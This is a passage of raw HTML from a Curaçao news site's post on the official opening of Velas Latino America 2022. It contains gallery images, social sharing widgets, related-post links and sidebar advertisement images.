data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?resize=300%2C177&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?resize=1024%2C604&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?resize=150%2C88&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?resize=768%2C453&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?resize=1200%2C708&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-31-1280x755-1.jpg?fit=1280%2C755&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure><figure class='gallery-item'>
			<div class='gallery-icon landscape'>
				<a href='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-33-1280x799/'><img width="1280" height="799" src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?fit=1280%2C799&amp;ssl=1" class="attachment-full size-full jetpack-lazy-image" alt="" loading="lazy" data-attachment-id="277476" data-permalink="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/velas-latinoamerica-33-1280x799/" data-orig-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?fit=1280%2C799&amp;ssl=1" data-orig-size="1280,799" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Velas Latinoamerica (33) (1280&#215;799)" data-image-description="" data-image-caption="" data-medium-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?fit=300%2C187&amp;ssl=1" data-large-file="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?fit=800%2C499&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?resize=300%2C187&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?resize=1024%2C639&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?resize=150%2C94&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?resize=768%2C479&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?resize=1200%2C749&amp;ssl=1 1200w" data-lazy-sizes="(max-width: 800px) 100vw, 800px" data-lazy-src="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/Velas-Latinoamerica-33-1280x799-1.jpg?fit=1280%2C799&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a>
			</div></figure>
		</div>

<div class='share-to-whatsapp-wrapper'><div class='share-on-whsp'>Share on: </div><a data-text='Apertura Ofisial Velas Latino America Curacao 2022' data-link='https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/' class='whatsapp-button whatsapp-share'>WhatsApp</a><div class='clear '></div></div><a title="Share this page to Telegram" onclick="telebuttonShare();"><img src=" https://kikotapasando.com/wp-content/plugins/wp-telegram-sharing/img/t-logo.svg" alt="Share this page to Telegram" width="64" class="wpts-teleg-icon"/></a>		<div id="atatags-542965381-62a0a161df694"></div>
		
		<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">KOMPARTI E NOTISIA AKI VIA / Share the news</h3><div class="sd-content"><ul><li class="share-facebook"><div class="fb-share-button" data-href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" data-layout="button_count"></div></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp" ><span>WhatsApp</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button" href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/?share=telegram" target="_blank" title="Click to share on Telegram" ><span>Telegram</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F&amp;title=Apertura%20Ofisial%20Velas%20Latino%20America%20Curacao%202022" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="Apertura Ofisial Velas Latino America Curacao 2022" data-content="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" title="Share on Tumblr">Share on Tumblr</a></li><li class="share-end"></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F&#038;media=https%3A%2F%2Fi0.wp.com%2Fkikotapasando.com%2Fwp-content%2Fuploads%2F2022%2F06%2FVelas-Latinoamerica-24-1280x961-1.jpg%3Ffit%3D1200%252C901%26ssl%3D1&#038;description=Apertura%20Ofisial%20Velas%20Latino%20America%20Curacao%202022" data-pin-do="buttonPin" data-pin-config="beside"><img src="https://i0.wp.com/assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png?w=800" data-recalc-dims="1" /></a></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li><li class="share-skype"><div class="skype-share" data-href="https://kikotapasando.com/2022/06/08/apertura-ofisial-velas-latino-america-curacao-2022/" data-lang="en-US" data-style="small" data-source="jetpack" ></div></li><li class="share-end"></li></ul></div></div></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-54296538-277465-62a0a161e7763' data-src='https://widgets.wp.com/likes/#blog_id=54296538&amp;post_id=277465&amp;origin=kikotapasando.com&amp;obj_id=54296538-277465-62a0a161e7763' data-name='like-post-frame-54296538-277465-62a0a161e7763' data-title='Like or Reblog'><h3 class="sd-title">Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	
</div>		</div>

	</div>

	</article>

		</div><!-- #content -->

		
		<ul class="default-wp-page clearfix">
			<li class="previous"><a href="https://kikotapasando.com/2022/06/08/de-drie-deelnemende-tallships-uit-mexico-brazilie-en-uruguay-feestelijk-ontvangen-in-willemstad/" rel="prev"><span class="meta-nav">&larr;</span> De drie deelnemende tallships uit Mexico, Brazilie en Uruguay feestelijk ontvangen in Willemstad.</a></li>
			<li class="next"><a href="https://kikotapasando.com/2022/06/08/karta-pa-presidente-di-parlamento-calmes-parlamento-di-korsou-destina-pa-frakasa-den-11-ana-no-a-ordena-organisa-profeshonalisa-parlamento-pueblo-mester-sa-esaki/" rel="next">Karta pa Presidente di Parlamento: Calmes: &#8220;Parlamento di Kòrsou destiná pa frakasá. Den 11 aña no a ordená, organisá profeshonalisá parlamento. Pueblo mester sa esaki.&#8221; <span class="meta-nav">&rarr;</span></a></li>
		</ul>

		
	<div class="related-posts-wrapper">

		<h4 class="related-posts-main-title">
			<i class="fa fa-thumbs-up"></i><span>You May Also Like</span>
		</h4>

		<div class="related-posts clearfix">

							<div class="single-related-posts">

					
					<div class="article-content">
						<h3 class="entry-title">
							<a href="https://kikotapasando.com/2017/08/09/sint-maarten-police-press-release-080817-kiko-ta-pasando-notisia/" rel="bookmark" title="Sint maarten: Police Press Release 080817 – Kiko Ta Pasando Notisia">
								Sint maarten: Police Press Release 080817 – Kiko Ta Pasando Notisia							</a>
						</h3><!--/.post-title-->

						<div class="below-entry-meta">
			<span class="posted-on"><a href="https://kikotapasando.com/2017/08/09/sint-maarten-police-press-release-080817-kiko-ta-pasando-notisia/" title="11:05 AM" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2017-08-09T11:05:51-04:00">August 9, 2017</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="https://kikotapasando.com/author/kikotapasando/"
					   title="REDAKSHON"
					>
						REDAKSHON					</a>
				</span>
			</span>

							<span class="comments">
													<i class="fa fa-comment"></i><a href="https://kikotapasando.com/2017/08/09/sint-maarten-police-press-release-080817-kiko-ta-pasando-notisia/?noamp=mobile#respond">0</a>												</span>
				</div>					</div>

				</div><!--/.related-->
							<div class="single-related-posts">

					
					<div class="article-content">
						<h3 class="entry-title">
							<a href="https://kikotapasando.com/2020/07/11/prome-minister-evelyn-wever-croes-acuerdo-entre-knops-y-wever-croes/" rel="bookmark" title="Prome Minister Evelyn Wever-Croes:     ACUERDO ENTRE KNOPS Y WEVER-CROES">
								Prome Minister Evelyn Wever-Croes:     ACUERDO ENTRE KNOPS Y WEVER-CROES							</a>
						</h3><!--/.post-title-->

						<div class="below-entry-meta">
			<span class="posted-on"><a href="https://kikotapasando.com/2020/07/11/prome-minister-evelyn-wever-croes-acuerdo-entre-knops-y-wever-croes/" title="7:08 AM" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2020-07-11T07:08:30-04:00">July 11, 2020</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="https://kikotapasando.com/author/kikotapasando/"
					   title="REDAKSHON"
					>
						REDAKSHON					</a>
				</span>
			</span>

							<span class="comments">
													<i class="fa fa-comment"></i><a href="https://kikotapasando.com/2020/07/11/prome-minister-evelyn-wever-croes-acuerdo-entre-knops-y-wever-croes/?noamp=mobile#respond">0</a>												</span>
				</div>					</div>

				</div><!--/.related-->
							<div class="single-related-posts">

					
					<div class="article-content">
						<h3 class="entry-title">
							<a href="https://kikotapasando.com/2017/06/24/korsou-ta-drenta-kolaborashon-ku-abc-network-pa-promoshon-riba-times-square-new-york-curacao-partners-with-abc-network-on-massive-times-square-billboard-campaign-in-new-york-city/" rel="bookmark" title="Kòrsou ta drenta kolaborashon ku ABC Network pa promoshon riba Times Square New York   &#8211;   Curaçao partners with ABC Network on massive Times Square billboard campaign in New York City!">
								Kòrsou ta drenta kolaborashon ku ABC Network pa promoshon riba Times Square New York   &#8211;   Curaçao partners with ABC Network on massive Times Square billboard campaign in New York City!							</a>
						</h3><!--/.post-title-->

						<div class="below-entry-meta">
			<span class="posted-on"><a href="https://kikotapasando.com/2017/06/24/korsou-ta-drenta-kolaborashon-ku-abc-network-pa-promoshon-riba-times-square-new-york-curacao-partners-with-abc-network-on-massive-times-square-billboard-campaign-in-new-york-city/" title="6:55 AM" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2017-06-24T06:55:42-04:00">June 24, 2017</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="https://kikotapasando.com/author/kikotapasando/"
					   title="REDAKSHON"
					>
						REDAKSHON					</a>
				</span>
			</span>

							<span class="comments">
													<i class="fa fa-comment"></i><a href="https://kikotapasando.com/2017/06/24/korsou-ta-drenta-kolaborashon-ku-abc-network-pa-promoshon-riba-times-square-new-york-curacao-partners-with-abc-network-on-massive-times-square-billboard-campaign-in-new-york-city/?noamp=mobile#respond">0</a>												</span>
				</div>					</div>

				</div><!--/.related-->
			
		</div><!--/.post-related-->

	</div>

	
<div id="comments" class="comments-area">

	
	<p class="must-log-in">You must <a href="https://kikotapasando.com/wp-login.php?redirect_to=https%3A%2F%2Fkikotapasando.com%2F2022%2F06%2F08%2Fapertura-ofisial-velas-latino-america-curacao-2022%2F%23respond">log in</a> to post a comment.</p><p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p>
</div><!-- #comments -->

	</div><!-- #primary -->


<div id="secondary">
	
	<aside id="block-49" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-large"><img loading="lazy" width="1024" height="371" src="https://kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021-1024x371.png" alt="" class="wp-image-251461" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?resize=1024%2C371&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?resize=300%2C109&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?resize=150%2C54&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?resize=768%2C279&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?resize=600%2C218&amp;ssl=1 600w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2021/12/Propoganda-Advertisement-12-27-2021.png?w=1031&amp;ssl=1 1031w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption><strong> </strong></figcaption></figure>
</aside><aside id="block-59" class="widget widget_block widget_text clearfix">
<p> <strong>Pa mas info manda un Email na kikotapas@outlook.com</strong> </p>
</aside><aside id="block-155" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="730" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435143815.jpg" alt="" class="wp-image-276720" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435143815.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435143815.jpg?resize=296%2C300&amp;ssl=1 296w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435143815.jpg?resize=148%2C150&amp;ssl=1 148w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-153" class="widget widget_block widget_media_image clearfix"><div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" width="1024" height="1024" src="https://kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n-1024x1024.jpg" alt="" class="wp-image-276715" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=768%2C768&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=800%2C800&amp;ssl=1 800w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?resize=200%2C200&amp;ssl=1 200w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/285947448_133778382599570_9100392558339107900_n.jpg?w=1196&amp;ssl=1 1196w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div></aside><aside id="block-154" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="720" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg" alt="" class="wp-image-276719" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654434871476.jpg?resize=200%2C200&amp;ssl=1 200w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-133" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="679" height="960" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435167239.jpg" alt="" class="wp-image-276721" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435167239.jpg?w=679&amp;ssl=1 679w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435167239.jpg?resize=212%2C300&amp;ssl=1 212w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654435167239.jpg?resize=106%2C150&amp;ssl=1 106w" sizes="(max-width: 679px) 100vw, 679px" /></figure>
</aside><aside id="block-152" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="794" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654421699884.jpg" alt="" class="wp-image-276709" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654421699884.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654421699884.jpg?resize=272%2C300&amp;ssl=1 272w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654421699884.jpg?resize=136%2C150&amp;ssl=1 136w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-149" class="widget widget_block widget_media_image clearfix"><div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" width="720" height="900" src="https://kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1653623975653.jpg" alt="" class="wp-image-275143" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1653623975653.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1653623975653.jpg?resize=240%2C300&amp;ssl=1 240w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1653623975653.jpg?resize=120%2C150&amp;ssl=1 120w" sizes="(max-width: 720px) 100vw, 720px" /></figure></div></aside><aside id="block-129" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-large"><img loading="lazy" width="679" height="1024" src="https://kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1652834509415-679x1024.jpg" alt="" class="wp-image-273095" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1652834509415.jpg?resize=679%2C1024&amp;ssl=1 679w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1652834509415.jpg?resize=199%2C300&amp;ssl=1 199w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1652834509415.jpg?resize=99%2C150&amp;ssl=1 99w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/FB_IMG_1652834509415.jpg?w=720&amp;ssl=1 720w" sizes="(max-width: 679px) 100vw, 679px" /></figure>
</aside><aside id="block-143" class="widget widget_block widget_media_image clearfix"><div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" width="720" height="1018" src="https://kikotapasando.com/wp-content/uploads/2022/05/269593087_4838286722927034_4192393055057028938_n.jpg" alt="" class="wp-image-273755" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/269593087_4838286722927034_4192393055057028938_n.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/269593087_4838286722927034_4192393055057028938_n.jpg?resize=212%2C300&amp;ssl=1 212w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/05/269593087_4838286722927034_4192393055057028938_n.jpg?resize=106%2C150&amp;ssl=1 106w" sizes="(max-width: 720px) 100vw, 720px" /></figure></div></aside><aside id="block-146" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-large"><img loading="lazy" width="724" height="1024" src="https://kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer-724x1024.jpg" alt="" class="wp-image-266663" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=724%2C1024&amp;ssl=1 724w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=212%2C300&amp;ssl=1 212w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=106%2C150&amp;ssl=1 106w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=768%2C1086&amp;ssl=1 768w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=1086%2C1536&amp;ssl=1 1086w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?resize=1448%2C2048&amp;ssl=1 1448w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/04/Ned-3A-flyer.jpg?w=2400&amp;ssl=1 2400w" sizes="(max-width: 724px) 100vw, 724px" /></figure>
</aside><aside id="block-156" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="1010" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654458900673.jpg" alt="" class="wp-image-276879" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654458900673.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654458900673.jpg?resize=214%2C300&amp;ssl=1 214w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654458900673.jpg?resize=107%2C150&amp;ssl=1 107w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-157" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-large"><img loading="lazy" width="576" height="1024" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654461064917-576x1024.jpg" alt="" class="wp-image-276880" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654461064917.jpg?resize=576%2C1024&amp;ssl=1 576w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654461064917.jpg?resize=169%2C300&amp;ssl=1 169w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654461064917.jpg?resize=84%2C150&amp;ssl=1 84w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654461064917.jpg?w=720&amp;ssl=1 720w" sizes="(max-width: 576px) 100vw, 576px" /></figure>
</aside><aside id="block-158" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="720" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg" alt="" class="wp-image-276881" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509441523.jpg?resize=200%2C200&amp;ssl=1 200w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-159" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="720" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg" alt="" class="wp-image-276882" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509547641.jpg?resize=200%2C200&amp;ssl=1 200w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-160" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="720" height="720" src="https://kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg" alt="" class="wp-image-276883" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg?w=720&amp;ssl=1 720w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/FB_IMG_1654509550698.jpg?resize=200%2C200&amp;ssl=1 200w" sizes="(max-width: 720px) 100vw, 720px" /></figure>
</aside><aside id="block-161" class="widget widget_block widget_media_image clearfix">
<figure class="wp-block-image size-full"><img loading="lazy" width="747" height="960" src="https://kikotapasando.com/wp-content/uploads/2022/06/286678497_5284208881617214_1617957682645320445_n.jpg" alt="" class="wp-image-276921" srcset="https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/286678497_5284208881617214_1617957682645320445_n.jpg?w=747&amp;ssl=1 747w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/286678497_5284208881617214_1617957682645320445_n.jpg?resize=233%2C300&amp;ssl=1 233w, https://i0.wp.com/kikotapasando.com/wp-content/uploads/2022/06/286678497_5284208881617214_1617957682645320445_n.jpg?resize=117%2C150&amp;ssl=1 117w" sizes="(max-width: 747px) 100vw, 747px" /></figure>
</aside><aside id="block-162" class="widget widget_block widget_media_image clearfix">
